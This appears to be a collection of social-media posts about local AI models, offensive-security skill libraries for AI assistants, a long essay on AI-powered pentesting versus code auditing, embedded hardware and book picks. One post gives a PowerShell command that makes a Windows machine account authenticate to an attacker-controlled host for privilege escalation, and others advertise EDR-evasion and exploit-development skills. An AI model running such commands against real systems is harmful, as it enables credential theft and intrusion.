Hey MiniMax, can you please help the local AI community that own 128 Gb unified memory devices like @NVIDIAAI DGX Spark, Apple or AMD with an agentic/coding version of the M3 model we can use for our harness ?
Maybe in the 60B range so we have enough memory left for agent swarms so we can maximize the total throughput in memory bandwidth constrained devices and also add a DSpark draft model for it.
In real life when someone want to become a coder for example he will attend a certain university not all the universities in his country and also become specialized an all the other domains like medicine, architecture, mechanical engineering, law, etc.
If you do this it would be the universal local model anyone will speak about in this huge community and help you gather a lot of adoption for your larger model.
Some people already tried to do REAP versions of your model but the quality is affected much more than if you guys are doing it from your end.
I really hope you consider this. Just give us an Alpha version and we'll try to work on it to make it better and evolve from there.
You can even name it MiniMax M3 Alpha Agent.
Thank you!
@SpaceTimeViking@ViC305 I have been using aeon model with dgx spark. So far so good. Are you planning to release Agents-A1? If yes, I would be very interested to use it for production
uphiago/recon-skills: 144 offensive security skills for recon and pentest. Field-validated techniques from 600+ targets across 45+ sectors. Updated with web enum, email sec, google dorks, cloud IAM, WordPress full compromise ch... https://t.co/pUvq61RPyT
virgiliojr94/book-to-skill: Turn any technical book PDF into a Claude Code skill — ready to study, reference, and use while you work. https://t.co/uy91MSK4gF
Offensive security knowledge base — 50+ docs covering web exploitation, bug bounty, privilege escalation, CTF writeups, APT emulation, and forensics. Real payloads, real workflows, built from the field. https://t.co/F3tPSDpIPI
Singapore's Foreign Minister published the architecture for his "second brain for a diplomat" yesterday. Architecture diagrams, design rationale, the works. A developer-style writeup of his own system.
It runs on a Raspberry Pi. It connects to his WhatsApp and Gmail, transcribes voice notes locally, ingests speeches and articles, and builds up a knowledge graph over time. It answers questions, drafts speeches, condenses information. He says he doesn't dare switch it off.
What @VivianBala built is one-of-one. There's no other setup like it. But what he built it from isn't.
He composed four open-source pieces:
- @NanoClaw_AI , the agent framework: https://t.co/JlIJqOVBFG
- Mnemon, the persistent memory layer: https://t.co/ugrB7uF6XL
- OneCLI, the credential proxy that keeps API keys out of the containers: https://t.co/sTGn59abpF
- The LLM Wiki pattern by Andrej Karpathy, the synthesis approach: https://t.co/wqvlVzcnyk
None of them are his. The composition is his. And then he published the composition: https://t.co/azzfijyzPs
He didn't keep it internal as Singapore's edge. He didn't spin it into a product. He didn't gatekeep. He wrote it up and put it on GitHub.
There are tens of thousands of doctors, lawyers, researchers, investors, and operators building one-of-one setups for themselves right now. Some simpler than Vivian's, some more elaborate. The impulse will be to sit on it. Treat it as your edge. Think about what product or company you could spin out of it. Resist that impulse.
Vivian put it directly: "The diplomat who learns to work with AI will have a meaningful edge. I think that edge is now."
The specific thing Vivian composed will be obsolete in months. His real edge isn't the system. It's his ability to build it. Being plugged in, up to speed, able to cut through the noise and connect the right pieces into something that brings real value.
Sharing the blueprint doesn't give that away. It amplifies it.
You become a beacon. Other people working on the same things find you. They share what they're building, suggest improvements, point at things you didn't know existed. You learn faster. You stay in the center of where things are happening. Publishing isn't giving away your edge. It's doubling down on it.
claude-red is a curated library of offensive security skills designed for the Claude skills system. Each skill is a structured SKILL.mdfile that primes Claude with expert-level methodology for a specific attack surface from SQLi to shellcode, EDR evasion to exploit development.
Resource: https://t.co/0XvEqoqPfv
(Automated) Pentesting is already dead
I found it interesting how many people misunderstood and ignored the context of my earlier post here, which was about (Tenzai) securing a $75M seed round, and more specifically AI powered automated penetration testing. I’ve been doing a wide range of pentests & audits (over 400 gigs) for about 22 years now. So I know a thing or two about it. But I still consider automated pentesting dead. Not in the way you might have thought though. I initially wrote a longer draft, but eventually folded and let Gemini shorten and polish it, because why not? :)
Why Automated Pentesting is Dead
It’s dead in the same way that running automated tools like Nessus and delivering 50-page reports were already dead 10 years ago. The new era of AI-powered automation is reviving that exact, low-value approach.
I’m not against AI—it will get better. I’m occasionally paying over $1k/month for tokens myself. It’s already working for many things, but it’s not yet scalable for efficient pentesting. Not because tokens are too expensive (they’ll get cheaper) or models aren’t reliable (they’ll improve, XBow is an example). It’s dead for two interconnected reasons:
The Problem of Noise and Fatigue
The same way old Nessus reports filled with tens or hundreds of valid findings were ignored, this new era of AI-generated issues will also be ignored. Right now, a report might have 2-3 golden findings. Soon, AI minion agents will tear your network apart and deliver 100 perfectly valid and severe issues.
If you’ve done quarterly tests against Fortune-50/500 customers for half a decade and delivered similar results over and over, you know what I mean. Remediation prioritization and fatigue are a serious issue. You eventually realize that what we sell (hacking, tests, security) is not the priority of money-making corporations. It's an obligation, often for compliance reasons, among other things.
Don't judge a CISO for archiving your all-red report and fixing only five issues by next day, week, month, year. Your “critical finding” is simply a business decision. The way it works is more like: “Will it cost us $1M if exploited?” If the answer is no, it’s not categorized, prioritized, or handled as critical, because doing so initiates a complicated chain of internal actions that itself costs time and money. So in many cases the reason pentests are not efficient is not due to lack of proof, but lack of business priority. You don’t need a functional PoC (human or LLM generated) to address that. A shell (vs plain text finding) on a system that inherently is not business critical in an infrastructure, will not magically make it a priority. This is a big promise deliverable by AI automated pentest startups. It sure works, and they can make it rain shells, but that won’t solve any problem that’s not already been addressed by typical pentests.
The Real Bottleneck
The security industry has just started giving customers a break from all that automated testing report noise by focusing on deep, manual labor research. It's finally the norm to deliver just half a dozen findings that really matter—not some HSTS header missing nonsense. I’m just hoping that the new wave and era of AI powered automated testing will not bring back those now-just-more-accurate Nessus or Core Impact reports. Ah, I forgot to mention; we have already started, enjoyed and wrapped up an era focused on automatic finding,exploit based validation and reporting of vulns. I’m not saying where we’re heading is the same, but it looks too damn similar. Just way more reliable and way cooler than a python script reasoning with an IF loop, whether to sling an SMB1 exploit or not. Does that mean we should stop finding and reporting things this way? Not really.
The biggest issue isn't the accuracy of results. Well, it was, for a period in the mid 2000s. but we got better at it and tools were improved. It's that the receiving end of these automations and reports are not automated. The pipeline and people who handle those findings have not improved as much as the tools have. It doesn’t matter how many critical issues are found and exploited; they are still handled by humans, treated as business decisions, and reviewed case-by-case.
Black-box testing is inefficient
Delivering 50 valid findings via Nessus, Burp Scanner, or their LLM-powered equivalent is simply not efficient. A black-box test is inherently inefficient nowadays because it’s not finding and reporting problems at their core and root. It just finds and reports symptoms that resurface over and over. Ever logged in to an enterprise’s Qualys or Tenable vulnerability management platform? It’s not a pretty scene, I can tell you! That is peak automated pentesting results at scale!
For as long and as many times as you repeat a black-box pentest, you will find new and repetitive issues. Don’t believe me? Ask Fortinet. They still consistently deliver you SQLi, CMDi and vanilla mem-corruption patches on a monthly basis, all year and every year. All found and exploited via black-box testing by your favorite APTs. Yes, that's also a form of testing. They just don’t deliver their findings to the vendor. Fortinet is hardly an isolated case and vendor. If it was meant to be fixed this way, Bug bounty platforms and similar businesses would not be doing so well. They print money, for themselves and hunters, relying on the fact that for over two decades we as an industry have failed to properly and fundamentally fix some of those issues. And btw, if a company has actually followed the proper (security) maturity path before they expose themselves to Bug Bounty platforms, it means that they have already gone through multiple rounds of all sorts of pentests.Yet people still find good stuff, a lot of them actually! Let’s not go down the “we were aware of the issue” or duplicate rabbit holes there. Moreover, if AI based automated testing is so good and the future (well, it is the future), it begs the question of why are they getting banned to operate autonomously on bug bounty platforms? Is it the noise? Are these platforms monopolizing “the market” for their own future agent implementations?
The Efficient Way: Security Engineering
Ok, what’s the more efficient way of doing things then? I’m glad you asked. Security engineering is the very short answer.? Check in with any respected pentesting and consulting shop. You will find the majority of their customer engagements are not black-box tests.
Typical consulting shops prefer white-box audits—reviewing your code, configurations, infra-as-code, or cloud security posture. They basically sell security engineering as a service.
The idea is to deliver the most bang for the buck in the shortest time possible, often a week or two. People don’t hire them for low-hanging fruit; they hire them to go deep. They find logical issues or complicated chains of problems that have an unexpected impact. Their JIRA is likely already full of findings from their own automated tools.
Interestingly, if you review some of their reports, PoC or actual demonstration of successful exploitation is absent in those security engineering focused reports. The proof is already in the code. Exploitation is a redundant and time consuming task with no real added value for the customer. In Red Team engagement? Absolutely! But in pentests, not really.
Statistically, and from personal experience, you find more and better vulnerabilities when you can read the code or reverse-engineer the system, compared to blindly poking something exposed over the network. You focus on key components and narrow down to the root cause. When you notice a pattern, you stop reporting individual cases and write about the nature of the repeated insecure practice. You put your finger on the root cause in the code. If you’ve got time and the customer is also capable of consuming it, you may also deliver long-term detection and mitigation solutions. A fuzzing harness, a CodeQL query, a CI/CD change recommendation, etc. You explain to them the variant analysis playbook. Fill up that Executive Summary section! Typical security engineering workflow. You know the drill. THAT IS MORE EFFICIENT! It lasts beyond your two weeks of pentest, and it can actually reduce work on the customer side in the long run.
In contrast, typical black-box pentests can be summarized in a few sentences: Patch your stuff, update your dependencies, audit your passwords, don't get phished, and follow hardening guidelines. Then fix this, this, this, this, this, this, this, and this. You’ll be good, until next year, when we come to redo the test and tell you the same things again, in our updated report template and with slightly improved language.
AI + SAST: The Real Game Changer
This is where things are actually starting to look bright. We have never been so efficient and reasonably reliable at scale at studying, understanding the code and finding issues in the code and config!
We’ve gone through multiple iterations of SAST (Static Application Security Testing) and DAST (Dynamic Application Security Testing) solutions. They scaled up, but so did their false-positives and the human resources needed to review the results. CodeQL, Semgrep, and similar tools have gotten much better and are now part of most engagements because they work well when fine-tuned.
So how is AI-powered SAST different from AI-powered automated pentest? In the case of classic (automated) pentests, we had a semi-working solution that scaled but didn't solve root causes—it pointed out symptoms at scale. In the case of AI-powered SAST, because of the nature of white-box tests and how good models are becoming at understanding code, they can dig deep at a very reasonable cost and time: find the root cause of issues, find all variants of it, produce a Proof of Concept, and, as the cherry on top, also deliver a patch for it! That still needs some human intervention, but the value is immense.
We have token-eating monsters at Google, OpenAI, and other places doing exactly that. Many have experimented with similar pipelines at home, winning at a 10x, 50x, or 100x ROI in potential bug value compared to the cost of used tokens. Compare that to the black-box approach: “I sent 100 requests at this endpoint, after a few hours of poking blindly, to confirm a SQLi. Here’s an OWASP link and a Python PoC. To save tokens, I leave it to you and your developers to find the other 100 variants of this issue.”
Turns out with $200 worth of tokens you can either bang your blackbox testing agent around until it finds a few bugs remotely and exploit them and call it a win, or spend the same amount of money and a fraction of time to find, triage, exploit, variant analysis, patch and report a dozen of them by consuming code.
These token-eating monsters will, and have already, create their own chain of bottlenecks and noise problems. Most of you have probably heard or participated in one revision of the FFMPEG vs Google AI debate. But on the bright side, we already have a (mostly) functional solution for that. It is less freakish to let an LLM send a pull request, than letting it manage your network infrastructure and wipe a database or two on its way.
Conclusion
Please don’t be mad at me when I say pentesting, in the classical form we know it, even with an AI engine swap, is dead.
It’s not completely dead. Different testing approaches should still co-exist, and bug bounty platforms will keep growing. But at the end, if we measure the outcomes, especially with the trajectory that AI-powered SAST and DAST is going, it will be very hard for the black-box approach to catch up in terms of long-term efficiency and impact.
In 2025, after watching all sorts of crazy feats APTs pull off, if you’re still trying to answer the question of whether your network can be hacked, you need a wake-up call. The answer is ALWAYS yes. You’re in a much better state if the question is more about HOW, on a case-by-case basis, which is the typical black-box focus. But if you’re aiming for a more long-term and effective approach to identifying and fixing issues, black-box (automated) testing is probably among the least efficient ways to get there.
Knowing that we’re doomed to get breached one way or another doesn't make those tests irrelevant. It just means it's better to focus on what happens after a breach and improve there instead. LLM-powered SOC? Token-eating XDRs? AI-powered deployment following security best practices? And just when I was about to wrap up this draft, Google announced their Agentic SOC! That should mean something, looking at the direction they are taking.
Whatever is coming down the pipe, I’m curious about it. I just wouldn't put my money on LLM agents running Nmap and blindly slinging payloads until one sticks. If they automatically identify the target, fetch a local copy to reverse or audit, find a bug, and then exploit it (Hello XBow)? Hell yeah! I’m in for that. But then again, isn’t that sliding into the SAST side of things?
As a bonus data point, I asked ChatGPT to review the entire history of OWASP-TOP10 for as long as it has been a thing. Apparently bug classes just swap ranks. New ones occasionally emerge, but they never disappear! How many more pentests and exploits do we need to teach people how to properly handle ../../.. ?
State of Embedded Q4 2025: Covering the latest at NVIDIA, Qualcomm, Rockchip, MediaTek, Raspberry Pi, Cix, Texas Instruments and more
https://t.co/xjcKdhudYe
@sbcwiki@RadxaComputer@Qualcomm Great read! The Radxa Dragon Q6A review was excellent.
So many awesome devices lately: Orange Pi 6+, Radxa Airbox Q900 are must-sees. Please tell me you're reviewing the Q900 and Pi 6+ next!
You can add a local "=AI" formula in Excel
Excel can then process data using a free and open-source AI model like Gemma.
This means that it understands what's in the cells and returns a tailored response based on your prompt even offline.
Steps to set it up and examples below
Today’s a good day to recommend this exceptional book by @KimZetter: Countdown to Zero Day. Easily in my top 2 cybersecurity books, right after The Cuckoo’s Egg by Clifford Stoll.
There’s even an audiobook version for your next commute or evening walk.
Amazon
📘 https://t.co/RSYqDSUqFA
Google
📖 https://t.co/ntGOzd4rkd
Audible
🎧 https://t.co/8u5EuVDprZ
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ?
Simply use:
powershell iwr http://192.168.56.1 -UseDefaultCredentials
To get an HTTP coerce of the machine account.
👇🧵
By popular request, I finally did the tedious task of putting the ~100 videos from the @offby1security streams into playlists. At least most of them. Crazy how the channel is ~2 years old.
https://t.co/AcFTeg6ERj
By making minor changes to command-line arguments, it is possible to bypass EDR/AV detections.
My research, comprising ~70 Windows executables, found that all of them were vulnerable to this, to varying degrees.
Here’s what I found and why it matters 👉 https://t.co/VpMttDZI9K